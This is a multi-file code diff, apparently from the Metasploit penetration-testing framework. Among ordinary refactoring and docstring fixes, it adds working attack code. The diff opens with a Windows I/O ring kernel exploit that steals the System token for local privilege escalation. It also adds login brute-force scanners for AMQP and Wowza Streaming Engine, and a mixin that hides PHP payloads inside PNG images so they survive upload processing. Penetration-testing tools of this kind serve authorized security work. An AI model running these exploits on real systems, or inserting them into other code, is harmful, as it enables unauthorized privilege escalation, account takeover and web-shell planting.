+    dprintf("System EPROC address: %llx", ullSystemEPROCaddr);
+
+    if (GetObjPtr((PVOID*)&ullTargEPROCaddr, GetCurrentProcessId(), hProc) != S_OK) {
+        dprintf("Unable to get Current EPROC address");
+        return E_FAIL;
+    }
+
+    dprintf("Current process EPROC address: %llx", ullTargEPROCaddr);
+
+    pFakeRegBuffers = VirtualAlloc((LPVOID)ullFakeRegBufferAddr, sizeof(ULONG64) * ulFakeRegBufferCnt, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
+
+    if (pFakeRegBuffers != (PVOID)ullFakeRegBufferAddr) {
+        dprintf("Call to VirtualAlloc() failed (0x%X)", GetLastError());
+        return E_FAIL;
+    }
+
+    memset(pFakeRegBuffers, 0, sizeof(ULONG64) * ulFakeRegBufferCnt);
+
+    phIoRing = *(_HIORING**)&hIoRing;
+    phIoRing->RegBufferArray = pFakeRegBuffers;
+    phIoRing->BufferArraySize = ulFakeRegBufferCnt;
+
+    if (IoRingRead(pFakeRegBuffers, ullSystemEPROCaddr + EPROC_TOKEN_OFFSET, &ullSysToken, sizeof(ULONG64)) != S_OK) {
+        dprintf("Unable to read System token through a I/O ring read operation");
+        return E_FAIL;
+    }
+
+    dprintf("System token is at: %llx", ullSysToken);
+
+    if (IoRingWrite(pFakeRegBuffers, ullTargEPROCaddr + EPROC_TOKEN_OFFSET, &ullSysToken, sizeof(ULONG64)) != S_OK) {
+        dprintf("Unable to write System token through a I/O ring write operation");
+        return E_FAIL;
+    }
+
+    IoRingWrite(pFakeRegBuffers, (ULONG64)&pIoRing->RegBuffersCount, &null, 0x10);
+
+    return S_OK;
+}
@@ -0,0 +1,81 @@
+#pragma once
+
+#include <windows.h>
+#include <ioringapi.h>
+#include "exploit.h"
+
+typedef struct _NT_IORING_CREATE_FLAGS
+{
+    enum _NT_IORING_CREATE_REQUIRED_FLAGS Required;
+    enum _NT_IORING_CREATE_ADVISORY_FLAGS Advisory;
+} NT_IORING_CREATE_FLAGS, * PNT_IORING_CREATE_FLAGS;
+
+typedef struct _NT_IORING_INFO
+{
+    enum IORING_VERSION IoRingVersion;
+    struct _NT_IORING_CREATE_FLAGS Flags;
+    unsigned int SubmissionQueueSize;
+    unsigned int SubmissionQueueRingMask;
+    unsigned int CompletionQueueSize;
+    unsigned int CompletionQueueRingMask;
+    struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue;
+    struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue;
+} NT_IORING_INFO, * PNT_IORING_INFO;
+
+typedef struct _IOP_MC_BUFFER_ENTRY
+{
+    USHORT Type;
+    USHORT Reserved;
+    ULONG Size;
+    ULONG ReferenceCount;
+    ULONG Flags;
+    LIST_ENTRY GlobalDataLink;
+    PVOID Address;
+    ULONG Length;
+    CHAR AccessMode;
+    ULONG MdlRef;
+    struct _MDL* Mdl;
+    KEVENT MdlRundownEvent;
+    PULONG64 PfnArray;
+    BYTE PageNodes[0x20];
+} IOP_MC_BUFFER_ENTRY, * PIOP_MC_BUFFER_ENTRY;
+
+typedef struct _IORING_OBJECT
+{
+    short Type;
+    short Size;
+    struct _NT_IORING_INFO UserInfo;
+    void* Section;
+    struct _NT_IORING_SUBMISSION_QUEUE* SubmissionQueue;
+    struct _MDL* CompletionQueueMdl;
+    struct _NT_IORING_COMPLETION_QUEUE* CompletionQueue;
+    unsigned __int64 ViewSize;
+    long InSubmit;
+    unsigned __int64 CompletionLock;
+    unsigned __int64 SubmitCount;
+    unsigned __int64 CompletionCount;
+    unsigned __int64 CompletionWaitUntil;
+    struct _KEVENT CompletionEvent;
+    unsigned char SignalCompletionEvent;
+    struct _KEVENT* CompletionUserEvent;
+    unsigned int RegBuffersCount;
+    struct _IOP_MC_BUFFER_ENTRY** RegBuffers;
+    unsigned int RegFilesCount;
+    void** RegFiles;
+} IORING_OBJECT, * PIORING_OBJECT;
+
+typedef struct _HIORING
+{
+    HANDLE handle;
+    NT_IORING_INFO Info;
+    ULONG IoRingKernelAcceptedVersion;
+    PVOID RegBufferArray;
+    ULONG BufferArraySize;
+    PVOID Unknown;
+    ULONG FileHandlesCount;
+    ULONG SubQueueHead;
+    ULONG SubQueueTail;
+}_HIORING;
+
+HRESULT IoRingSetup(PIORING_OBJECT* ppIoRingAddr);
+HRESULT IoRingLpe(ULONG pid, ULONG64 ullFakeRegBufferAddr, ULONG dwFakeRegBufferCnt);
@@ -154,3 +154,81 @@ typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(

 #define TYPE_WINDOW 1
 typedef PVOID(__stdcall* fHMValidateHandle)(HANDLE hHandle, DWORD dwType);
+
+//
+// Taken from ntdef.h
+//
+
+// Unicode strings are counted 16-bit character strings. If they are
+// NULL terminated, Length does not include trailing NULL.
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+#ifdef MIDL_PASS
+	[size_is(MaximumLength / 2), length_is((Length) / 2)] USHORT* Buffer;
+#else // MIDL_PASS
+	_Field_size_bytes_part_opt_(MaximumLength, Length) PWCH   Buffer;
+#endif // MIDL_PASS
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
+	PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
+} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
+
+//
+// Taken from wdm.h
+//
+typedef struct _IO_STATUS_BLOCK {
+	union {
+		NTSTATUS Status;
+		PVOID    Pointer;
+	};
+	ULONG_PTR Information;
+} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
+
+typedef NTSTATUS(__stdcall* fNtCreateFile)(
+	PHANDLE FileHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	PLARGE_INTEGER AllocationSize,
+	ULONG FileAttributes,
+	ULONG ShareAccess,
+	ULONG CreateDisposition,
+	ULONG CreateOptions,
+	PVOID EaBuffer,
+	ULONG EaLength
+	);
+
+typedef NTSTATUS(__stdcall* fNtDeviceIoControlFile)(
+	HANDLE FileHandle,
+	HANDLE Event,
+	PVOID ApcRoutine, // PIO_APC_ROUTINE is just a pointer to a function
+	PVOID ApcContext,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	ULONG IoControlCode,
+	PVOID InputBuffer,
+	ULONG InputBufferLength,
+	PVOID OutputBuffer,
+	ULONG OutputBufferLength
+	);
+
+typedef NTSTATUS(__stdcall* fNtCreateIoCompletion)(
+	PHANDLE IoCompletionHandle,
+	ACCESS_MASK DesiredAccess,
+	POBJECT_ATTRIBUTES ObjectAttributes,
+	ULONG NumberOfConcurrentThreads
+	);
+
+typedef NTSTATUS(__stdcall* fNtSetIoCompletion)(
+	HANDLE IoCompletionHandle,
+	ULONG CompletionKey,
+	PIO_STATUS_BLOCK IoStatusBlock,
+	NTSTATUS CompletionStatus,
+	ULONG NumberOfBytesTransferred
+	);
@@ -76,7 +76,7 @@ module ResponseDataHelper
    begin
      # If we are running the data service on the same box this will ensure we only write
      # the file if it is somehow not there already.
-      unless File.exists?(save_path) && File.read(save_path, mode: 'rb') == decoded_file
+      unless File.exist?(save_path) && File.read(save_path, mode: 'rb') == decoded_file
        File.write(save_path, decoded_file, mode: 'wb')
      end
    rescue => e
@@ -0,0 +1,89 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'rex/proto/amqp'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      class AMQP
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+
+        DEFAULT_PORT         = 5671
+        LIKELY_PORTS         = [ DEFAULT_PORT, 5672 ]
+        LIKELY_SERVICE_NAMES = [ 'amqp', 'amqps' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY           = nil
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            result_options.merge!(connect_login(credential.public, credential.private))
+          rescue Rex::Proto::Amqp::Error::NegotiationError => e
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            result_options[:proof] = e.message
+          rescue Rex::Proto::Amqp::Error::AmqpError
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          end
+
+          result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = "amqp#{ssl ? 's' : ''}"
+          result
+        end
+
+        private
+
+        def connect_login(username, password)
+          result = {}
+          amqp_client = Rex::Proto::Amqp::Version091::Client.new(
+            host,
+            port: port,
+            context: { 'Msf' => framework, 'MsfExploit' => framework_module },
+            ssl: ssl,
+            ssl_version: ssl_version
+          )
+          amqp_client.connect(connection_timeout)
+          amqp_client.send_protocol_header
+          amqp_client.connection_start(username, password)
+          resp = amqp_client.recv_frame
+
+          unless resp.is_a?(Rex::Proto::Amqp::Version091::Frames::AmqpVersion091MethodFrame)
+            raise Rex::Proto::Amqp::Error::UnexpectedReplyError.new(resp)
+          end
+
+          if resp.class_id == Rex::Proto::Amqp::Version091::Frames::MethodArguments::AmqpVersion091ConnectionClose::CLASS_ID && \
+              resp.method_id == Rex::Proto::Amqp::Version091::Frames::MethodArguments::AmqpVersion091ConnectionClose::METHOD_ID
+            result[:status] = Metasploit::Model::Login::Status::INCORRECT
+            result[:proof] = resp.arguments.reply_text
+            return result
+          end
+
+          unless resp.class_id == Rex::Proto::Amqp::Version091::Frames::MethodArguments::AmqpVersion091ConnectionTune::CLASS_ID && \
+              resp.method_id == Rex::Proto::Amqp::Version091::Frames::MethodArguments::AmqpVersion091ConnectionTune::METHOD_ID
+            raise Rex::Proto::Amqp::Error::UnexpectedReplyError.new(resp)
+          end
+
+          result[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+          result
+        ensure
+          amqp_client.close
+        end
+
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,65 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      class WowzaStreamingEngineManager < HTTP
+
+        DEFAULT_PORT = 8088
+        PRIVATE_TYPES = [ :password ].freeze
+        LOGIN_STATUS = Metasploit::Model::Login::Status
+
+        # Checks if the target is Wowza Streaming Engine Manager. The login module should call this.
+        #
+        # @return [Boolean] TrueClass if target is Wowza Streaming Engine Manager, otherwise FalseClass
+        def check_setup
+          res = send_request({ 'uri' => normalize_uri('/enginemanager/login.htm') })
+
+          return false unless res
+          return false unless res.code == 200
+
+          res.body.include?('Wowza Streaming Engine Manager')
+        end
+
+        #
+        # Attempts to login to Wowza Streaming Engine server via Manager web interface
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        #
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          res = send_request({
+            'method' => 'POST',
+            'uri' => normalize_uri('/enginemanager/j_spring_security_check'),
+            'vars_post' => {
+              'wowza-page-redirect' => '',
+              'j_username' => credential.public.to_s,
+              'j_password' => credential.private.to_s,
+              'host' => 'http://localhost:8087'
+            }
+          })
+
+          unless res
+            result_opts.merge!({ status: LOGIN_STATUS::UNABLE_TO_CONNECT })
+          end
+
+          if res && res.code == 302 && res['location'].to_s.include?('Home.htm')
+            cookie = res.get_cookies
+            result_opts.merge!({ status: LOGIN_STATUS::SUCCESSFUL, proof: cookie.to_s }) unless cookie.blank?
+          end
+
+          Result.new(result_opts)
+        end
+      end
+    end
+  end
+end
@@ -123,8 +123,8 @@ module Metasploit
        # This method takes a {framework.db.cred.private.jtr_format} (string), and
        # returns the string number associated to the hashcat format
        #
-        # @param[String] a jtr_format string
-        # @return [String] the format number for Hashcat
+        # @param format [String] A jtr_format string
+        # @return [String] The format number for Hashcat
        def jtr_format_to_hashcat_format(format)
          case format
          # nix
@@ -237,7 +237,7 @@ module Metasploit

        # This method sets the appropriate parameters to run a cracker in wordlist mode
        #
-        # @param[String] a file location of the wordlist to use
+        # @param file [String] A file location of the wordlist to use
        def mode_wordlist(file)
          self.increment_length = nil
          self.incremental = nil
@@ -278,7 +278,7 @@ module Metasploit

        # This method sets the john to single mode
        #
-        # @param[String] a file location of the wordlist to use
+        # @param file [String] A file location of the wordlist to use
        def mode_single(file)
          if cracker == 'john'
            self.wordlist = file
@@ -292,8 +292,7 @@ module Metasploit
        # This method follows a decision tree to determine the path
        # to the cracker binary we should use.
        #
-        # @return [NilClass] if a binary path could not be found
-        # @return [String] the path to the selected JtR binary
+        # @return [String, NilClass] Returns Nil if a binary path could not be found, or a String containing the path to the selected JTR binary on success.
        def binary_path
          # Always prefer a manually entered path
          if cracker_path && ::File.file?(cracker_path)
@@ -2,8 +2,8 @@
 # to the string format hashcat is expecting.
 # https://hashcat.net/wiki/doku.php?id=example_hashes
 #
-# @param [credClass] a credential from framework.db
-# @return [String] the hash in jtr format or nil on no mach
+# @param cred [credClass] A credential from framework.db
+# @return [String] The hash in jtr format or nil on no match.
 def hash_to_hashcat(cred)
  case cred.private.type
  when 'Metasploit::Credential::NTLMHash'
@@ -1,8 +1,8 @@
 # This method takes a {framework.db.cred}, and normalizes it
 # to the string format JTR is expecting.
 #
-# @param [credClass] a credential from framework.db
-# @return [String] the hash in jtr format or nil on no mach
+# @param cred [credClass] A credential from framework.db
+# @return [String] The hash in jtr format or nil on no match.
 def hash_to_jtr(cred)
  case cred.private.type
  when 'Metasploit::Credential::NTLMHash'
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.3.5"
+      VERSION = "6.3.11"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -317,9 +317,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -373,9 +371,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -433,9 +429,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -482,9 +476,7 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    # References
    output << dump_references(mod, indent)
@@ -524,9 +516,8 @@ class ReadableText
    end

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n\n"
+    output << dump_description(mod, indent)
+    output << "\n"

    return output
  end
@@ -556,9 +547,7 @@ class ReadableText
    output << dump_traits(mod)

    # Description
-    output << "Description:\n"
-    output << word_wrap(Rex::Text.compress(mod.description))
-    output << "\n"
+    output << dump_description(mod, indent)

    output << dump_references(mod, indent)

@@ -1141,17 +1130,44 @@ class ReadableText
    return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
  end

-  # Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
-  # a bit to add indention
+  # Dumps the module description
  #
-  # @param str [String] the string to wrap.
-  # @param indent [Integer] the indentation amount.
-  # @param col [Integer] the column wrap width.
-  # @return [String] the wrapped string.
-  def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
-    return Rex::Text.wordwrap(str, indent, col)
+  # @param mod [Msf::Module] the module.
+  # @param indent [String] the indentation string
+  # @return [String] the string description
+  def self.dump_description(mod, indent)
+    description = mod.description
+
+    output = "Description:\n"
+    output << word_wrap_description(description, indent)
+    output << "\n\n"
  end

+  # @param str [String] the string to wrap.
+  # @param indent [String] the indentation string
+  # @return [String] the wrapped string.
+  def self.word_wrap_description(str, indent = '')
+    return '' if str.blank?
+
+    str_lines = str.strip.lines(chomp: true)
+    # Calculate the preceding whitespace length of each line
+    smallest_preceding_whitespace = nil
+    str_lines[1..].to_a.each do |line|
+      preceding_whitespace = line[/^\s+/]
+      if preceding_whitespace && (smallest_preceding_whitespace.nil? || preceding_whitespace.length < smallest_preceding_whitespace)
+        smallest_preceding_whitespace = preceding_whitespace.length
+      end
+    end
+
+    # Normalize any existing left-most whitespace on each line; Ignoring the first line which won't have any preceding whitespace
+    result = str_lines.map.with_index do |line, index|
+      next if line.blank?
+
+      "#{indent}#{index == 0 || smallest_preceding_whitespace.nil? ? line : line[smallest_preceding_whitespace..]}"
+    end.join("\n")
+
+    result
+  end
 end

 end end
@@ -12,7 +12,7 @@ module Msf::Auxiliary::ManageEngineXnode::Config
  # @return [Hash, Integer] Hash containing the data repositories (tables) and their fields (columns) to dump if reading the config file succeeded, error code otherwise
  def grab_config(config_file)
    # get the specified data repositories (tables) and fields (columns) to dump from the config file
-    return CONFIG_FILE_DOES_NOT_EXIST unless File.exists? config_file
+    return CONFIG_FILE_DOES_NOT_EXIST unless File.exist?(config_file)

    begin
      config_contents = File.read(config_file)
@@ -123,7 +123,7 @@ class Msf::DBManager

  def initialize(framework, opts = {})
    self.framework = framework
-    self.migrated  = false
+    self.migrated  = nil
    self.modules_cached  = false
    self.modules_caching = false

@@ -1,6 +1,12 @@
 module Msf::DBManager::Connection
  # Returns true if we are ready to load/store data
  def active
+    # In some scenarios we may have a connection established already, and we need to manually check if migration is required
+    # This check normally happens in after_establish_connection, but that might not always get called - for instance during RSpec tests
+    if migrated.nil? && usable && connection_established?
+      self.migrated = !needs_migration?
+    end
+
    # usable and migrated a just Boolean attributes, so check those first because they don't actually contact the
    # database.
    usable && migrated && connection_established?
@@ -11,8 +17,6 @@ module Msf::DBManager::Connection
  #
  # @return [void]
  def after_establish_connection(opts={})
-    self.migrated = false
-
    begin
      # Migrate the database, if needed
      migrate(opts)
@@ -32,7 +36,6 @@ module Msf::DBManager::Connection
  # Connects this instance to a database
  #
  def connect(opts={})
-
    return false if not @usable

    nopts = opts.dup
@@ -47,8 +50,6 @@ module Msf::DBManager::Connection
    nopts['wait_timeout'] ||= 300

    begin
-      self.migrated = false
-
      # Check ApplicationRecord was already connected by Rails::Application.initialize! or some other API.
      unless connection_established?
        create_db(nopts)
@@ -129,7 +130,7 @@ module Msf::DBManager::Connection
  def disconnect
    begin
      ApplicationRecord.remove_connection
-      self.migrated = false
+      self.migrated = nil
      self.modules_cached = false
    rescue ::Exception => e
      self.error = e
@@ -171,7 +171,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
        begin
          unserialized_body = Base64.urlsafe_decode64(unserialized_body).b
        rescue ArgumentError => e
-          print_error("Data format suggests response body is not encoded: #{e}")
+          elog("Data format suggests response body is not encoded", e)
        end
      end

@@ -115,7 +115,7 @@ module Msf::DBManager::Loot

      # If the user updates the path attribute (or filename) we need to update the file
      # on disk to reflect that.
-      if opts[:path] && File.exists?(loot.path)
+      if opts[:path] && File.exist?(loot.path)
        File.rename(loot.path, opts[:path])
      end

@@ -34,8 +34,8 @@ module Msf::DBManager::Migration
    ActiveRecord::Migration.verbose = verbose
    ActiveRecord::Base.connection_pool.with_connection do
      begin
-        context = ActiveRecord::MigrationContext.new(gather_engine_migration_paths, ActiveRecord::SchemaMigration)
-        if context.needs_migration?
+        context = default_migration_context
+        if needs_migration?(context)
          ran = context.migrate
        end
          # ActiveRecord::Migrator#migrate rescues all errors and re-raises them
@@ -60,13 +60,28 @@ module Msf::DBManager::Migration
    return ran
  end

+  # Determine if the currently established database connection needs migration
+  #
+  # @param [ActiveRecord::MigrationContext,snil] context The migration context to check. Will default if not supplied
+  # @return [Boolean] True if migration is required, false otherwise
+  def needs_migration?(context = default_migration_context)
+    ActiveRecord::Base.connection_pool.with_connection do
+      return context.needs_migration?
+    end
+  end
+
  # Flag to indicate database migration has completed
  #
-  # @return [Boolean]
+  # @return [Boolean,nil]
  attr_accessor :migrated

  private

+  # @return [ActiveRecord::MigrationContext]
+  def default_migration_context
+    ActiveRecord::MigrationContext.new(gather_engine_migration_paths, ActiveRecord::SchemaMigration)
+  end
+
  # Loads gathers migration paths from all loaded Rails engines.
  #
  # @return Array[String]
@@ -122,7 +122,7 @@ module Msf::DBManager::ModuleCache
  #
  # @return [void]
  def purge_all_module_details
-    return if not self.migrated
+    return unless self.migrated
    return if self.modules_caching

    ::ApplicationRecord.connection_pool.with_connection do
@@ -136,8 +136,6 @@ class EncodedPayload
    # If the exploit needs the payload to be encoded, we need to run the list of
    # encoders in ranked precedence and try to encode with them.
    if needs_encoding
-      encoders = pinst.compatible_encoders
-
      # Make sure the encoder name from the user has the same String#encoding
      # as the framework's list of encoder names so we can compare them later.
      # This is important for when we get input from RPC.
@@ -151,6 +149,8 @@ class EncodedPayload
      elsif (reqs['Encoder'])
        wlog("#{pinst.refname}: Failed to find preferred encoder #{reqs['Encoder']}")
        raise NoEncodersSucceededError, "Failed to find preferred encoder #{reqs['Encoder']}"
+      else
+        encoders = compatible_encoders
      end

      encoders.each { |encname, encmod|
@@ -558,6 +558,20 @@ protected

    false
  end
+
+  def compatible_encoders
+    arch = reqs['Arch'] || pinst.arch
+    platform = reqs['Platform'] || pinst.platform
+
+    encoders = []
+
+    framework.encoders.each_module_ranked(
+      'Arch' => arch, 'Platform' => platform) { |name, mod|
+      encoders << [ name, mod ]
+    }
+
+    encoders
+  end
 end

 end
@@ -97,8 +97,7 @@ module Msf
    # Returns whether the requested payload is compatible with the module
    #
    # @param [String] name The payload name
-    # @param [TrueClass] Payload is compatible.
-    # @param [FlaseClass] Payload is not compatible.
+    # @return [Boolean] True if the payload is compatible, False if not.
    def is_payload_compatible?(name)
      p = framework.payloads[name]
      return false unless p
@@ -698,9 +698,8 @@ class Exploit < Msf::Module
  #
  # Returns whether the requested payload is compatible with the module.
  #
-  # @param [String] payload_name The payload name
-  # @return [TrueClass] Payload is compatible.
-  # @return [FalseClass] Payload is not compatible.
+  # @param name [String] The payload name
+  # @return [Boolean] True if the payload is compatible, False if it is not.
  #
  def is_payload_compatible?(name)
    p = framework.payloads[name]
@@ -56,7 +56,7 @@ module Exploit::CmdStager
    flavors = STAGERS.keys if flavors.empty?
    flavors.unshift('auto')

-    server_conditions = ['CMDSTAGER::FLAVOR', 'in', %w{auto certutil tftp wget curl fetch lwprequest psh_invokewebrequest ftp_http}]
+    server_conditions = ['CMDSTAGER::FLAVOR', 'in', %w{auto tftp wget curl fetch lwprequest psh_invokewebrequest ftp_http}]
    register_options(
      [
        OptAddressLocal.new('SRVHOST', [true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.', '0.0.0.0' ], conditions: server_conditions),
@@ -0,0 +1,115 @@
+# -*- coding: binary -*-
+
+require 'chunky_png'
+
+# This mixin module provides methods to inject persistent PHP payloads into a PNG file.
+# It is based on the article of Quentin Roland from SynActiv.
+# https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html
+# The mixin depends on the GEM library ChunkyPNG that provides the basic PNG image processing functionality.
+#
+# There are five methods of code injection described in the article:
+# 1: Inject PHP payload into the PNG comment field
+# 2: Inject PHP payload at the end of the PNG file, the so called raw insertion
+# 3: Inject PHP payload in the PLTE chunk of the PNG file
+# 4: Inject PHP payload in the IDAT chunk of the PNG file
+# 5: Inject PHP payload in a random tEXT chunk of the PNG file
+#
+# Method 1 and 2 will not survive any image compression configured and applied by a PHP web application
+# Method 3 will survive image compression, but no image resizing configured and applied by a PHP web application
+# Method 4 will survive all compression and resizing but payload is fixed and restricted.
+# Method 5 will survive Imagick resizing
+#
+# In the module below, we will offer only three (3) methods e.g, Raw, PLTE and tEXt for which we will combine method 1 and 5
+# TODO: IDAT chunk payload injection has most potential but is not flexible and is fixed for payloads that can be injected.
+#
+#                     No processing   PHP-GD compression      PHP-GD resizing         Imagick resizing
+# Raw insertion        ✅                    ❌                  ❌                     ❌
+# PLTE chunk           ✅                    ✅                  ❌                     ❌
+# TODO: IDAT chunk     ✅                    ✅                  ✅                     ✅
+# tEXt chunk           ✅                    ❌                  ❌                     ✅
+module Msf::Exploit::Format::PhpPayloadPng
+  # @param payload [String] Payload to be inserted into the generated PNG.
+  # @param injection_method [String] A string accepting only standard values 'RAW', 'PLTE', or 'TEXT'. Defaults to 'PLTE'.
+  # @return [String, nil] PNG binary string if injection is successful, otherwise nil if there was an error.
+  def inject_php_payload_png(payload, injection_method: 'PLTE')
+    if payload.empty?
+      print_error('PNG payload creation failed. No PHP payload provided.')
+      return nil
+    end
+
+    # Execute provided injection method
+    case injection_method
+    when 'RAW'
+      # Inject payload at the end of PNG (raw code injection)
+
+      # Use an image size of 1 pixel by 1 pixel to
+      # create the smallest possible PNG image.
+      image_width = 1
+      image_height = 1
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+
+      # add payload at the end of PNG
+      png_malicious = png.to_s + payload.to_s
+      return png_malicious
+
+    when 'PLTE'
+      # Inject payload in the PLTE chunk, which holds 1 to 256 palette entries as noted
+      # at http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html. Each
+      # entry will be a 3 byte long number of the form:
+      #    Red:   1 byte (0 = black, 255 = red)
+      #    Green: 1 byte (0 = black, 255 = green)
+      #    Blue:  1 byte (0 = black, 255 = blue)
+
+      # payload should have a length with modulo of 3 to fit the 3 bytes RGB palette.
+      # Section 4.1.2 PLTE Palette of http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html
+      # notes that PLTE chunks that are not divisible by 3 are considered a violation
+      # of the PNG protocol.
+      payload += ' ' while (payload.length % 3) != 0
+      # check if payload is not bigger then 768 (3x256) bytes to fit in the PLTE chunk
+      if payload.length > 768
+        print_error("PNG payload creation failed. Padded payload size (#{payload.length}) is larger than 768 bytes.")
+        return nil
+      end
+
+      # create base PNG with a right sized PLTE chunk to store the payload
+      image_width = payload.length / 3
+      image_height = payload.length / 3
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+
+      # create palette entries (max. 256) to host the payload
+      (0..((payload.length / 3) - 1)).each do |i|
+        png[i, 1] = ChunkyPNG::Color.rgb(i, 1, 1)
+      end
+
+      # cycle thru the chunks, find the PLTE chunk and write the payload
+      png_malicious = ChunkyPNG::Datastream.from_blob(png.to_blob)
+      png_malicious.each_chunk do |chunk|
+        if chunk.type == 'PLTE'
+          chunk.content = payload.to_s
+          break
+        end
+      end
+      return png_malicious.to_s
+
+    when 'TEXT'
+      # Inject payload in a new tEXt chunk generated with a random keyword
+      # tEXt chunks are used to store textual data that the recorder
+      # wishes to record within the image as noted at http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html
+      # section 4.3.2.1 tEXt Textual data
+
+      # Use an image size of 1 pixel by 1 pixel to
+      # create the smallest possible PNG image.
+      image_width = 1
+      image_height = 1
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+      # store payload in a tEXt chunk with a randomized keyword
+      random_keyword = Rex::Text.rand_text_alpha(4..16)
+      png.metadata[random_keyword] = payload.to_s
+      return png.to_s
+
+    else
+      print_error("PNG payload creation failed. No valid injection method #{injection_method} provided [RAW, PLTE, TEXT].")
+      return nil
+    end
+  end
+end
@@ -14,9 +14,9 @@ size #{obj_data.length}

  # Generates a Git LFS response to a batch request
  #
-  # @param [Rex::Proto::Http::Request] the Git LFS request
-  # @param [String] the URL of the Git server
-  # @param [Array] list of objects in Git repo
+  # @param request [Rex::Proto::Http::Request] The Git LFS request
+  # @param server_addr [String] The URL of the Git server
+  # @param repo_objects [Array] The list of objects in the Git repo
  #
  # @return [Msf::Exploit::Git::Lfs::Response]
  def get_batch_response(request, server_addr, repo_objects)
@@ -59,8 +59,8 @@ size #{obj_data.length}

  # Generates a response to a Git LFS object request
  #
-  # @param [Rex::Proto::Http::Request] Git client request
-  # @param [Array] list of objects in Git repository
+  # @param request [Rex::Proto::Http::Request] Git client request
+  # @param repo_objects [Array] List of objects in Git repository
  #
  # @return [Msf::Exploit::Git::Lfs::Response]
  def get_requested_obj_response(request, repo_objects)
@@ -126,7 +126,7 @@ module Client
  #
  # Detect if target has wildcards enabled for a record type
  #
-  # @param target [String] Domain to test
+  # @param domain [String] Domain to test
  # @param type [String] Record type to test
  #
  # @return [String] Address which is returned for wildcard requests
@@ -4,9 +4,8 @@
 module Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
  # performs a gitlab login
  #
-  # @param user [String] Username
-  # @param pass [String] Password
-  # @param timeout [Integer] The maximum number of seconds to wait before the request times out
+  # @param username [String] Username
+  # @param password [String] Password
  # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
  def gitlab_sign_in(username, password)
    sign_in_path = '/users/sign_in'
@@ -145,7 +145,7 @@ module Msf
          # behaviour on Windows, but let's be sure about it.
          #
